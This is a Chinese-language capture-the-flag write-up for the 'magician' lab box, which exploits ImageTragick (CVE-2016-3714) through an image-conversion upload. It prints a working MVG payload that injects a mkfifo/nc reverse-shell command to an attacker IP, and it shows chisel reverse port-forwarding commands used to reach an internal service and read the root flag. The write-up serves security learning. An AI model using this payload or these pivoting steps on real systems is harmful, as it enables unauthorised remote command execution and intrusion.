magician
CVE-2016–3714
This magical website lets you convert image file formats
0x01 信息收集
Nmap扫描端口开放服务,开放了21,8080,8081端口
根据靶场提示要把ip指向域名:magician
![](https://i-blog.csdnimg.cn/blog_migrate/41490445c0d2a80c554dc9b39d8eafc0.png)
0x02 漏洞利用(CVE-2016–3714)
先访问21端口,有个匿名访问,被做了点手脚“延迟”。登录进去里面是空的,根据提示访问
https://imagetragick.com.
根据给的网站提示,这个靶场的利用点大概是:CVE-2016–3714
![](https://i-blog.csdnimg.cn/blog_migrate/7b66c3a9643d86a0a9039c306280eb4d.png)
访问8081端口,这里有个文件上传。先上传一张正常的png图片
![](https://i-blog.csdnimg.cn/blog_migrate/037141f5646d0726e7665a7034663fa6.png)
截个包看看,正常
![](https://i-blog.csdnimg.cn/blog_migrate/bb89ddaeb9f35a860875771578c293a0.png)
网上的exp有很多,我试了这个
![](https://i-blog.csdnimg.cn/blog_migrate/13b9f88bac99f3273430bbabe151fc3e.png)
试了各种shell都弹不回来
![](https://i-blog.csdnimg.cn/blog_migrate/a18bca6a3d9b5569de8ea2dd4cf3ad78.png)
github上找到一个EXP
![](https://i-blog.csdnimg.cn/blog_migrate/2ded91667ad7716593566c7dcd30a456.png)
修改成自己攻击的ip
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 10.10.48.172 8888 0</tmp/gjdpez | /bin/sh >/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
pop graphic-context
pop graphic-context
成功弹回shell
![](https://i-blog.csdnimg.cn/blog_migrate/2cceb524fe3e0a33bbc840cf7423a829.png)
0x03 ROOT Flag
成功读取了USER的Flag
接下来这个ROOT的Flag整我半天都没有进展。问下大佬叫我看本机端口
netstat -tulpn
我的天,之前都没有看这里的习惯。又学到了。
直接curl一下
![](https://i-blog.csdnimg.cn/blog_migrate/3a2e88fdf0218b86f4f1b9e55a14c791.png)
是个网站,虽然可以直接curl请求上去。但是还是练练端口转发把
![](https://i-blog.csdnimg.cn/blog_migrate/8dc5b4665b6895d34f655abdf25576e4.png)
这边学大佬用的chisel这个转发工具。
wget 下载下来
![](https://i-blog.csdnimg.cn/blog_migrate/2df9fefbe9551dff5ce72282716ded8e.png)
用python把工具也传到目标机上
![](https://i-blog.csdnimg.cn/blog_migrate/82ab300eaa815d5f7dbef7185d88ca97.png)
攻击机上执行:./chisel_1.7.6_linux_amd64 server --reverse --port 9001
目标机上执行:./chisel_1.7.6_linux_amd64 client 10.10.178.24:9001 R:9002:127.0.0.1:6666
把攻击机上的9002端口转发到目标机的6666端口上
![](https://i-blog.csdnimg.cn/blog_migrate/dd11a517c6bde42586d1df5021db68f5.png)
访问该网站是个cat命令,直接读取root.txt,经过了base64编码
![](https://i-blog.csdnimg.cn/blog_migrate/0d3f9cc8fe25485dc94e7c650c747146.png)
直接解码获得Flag
![](https://i-blog.csdnimg.cn/blog_migrate/b8ec88a18edc1236aa450fe28df07e63.png)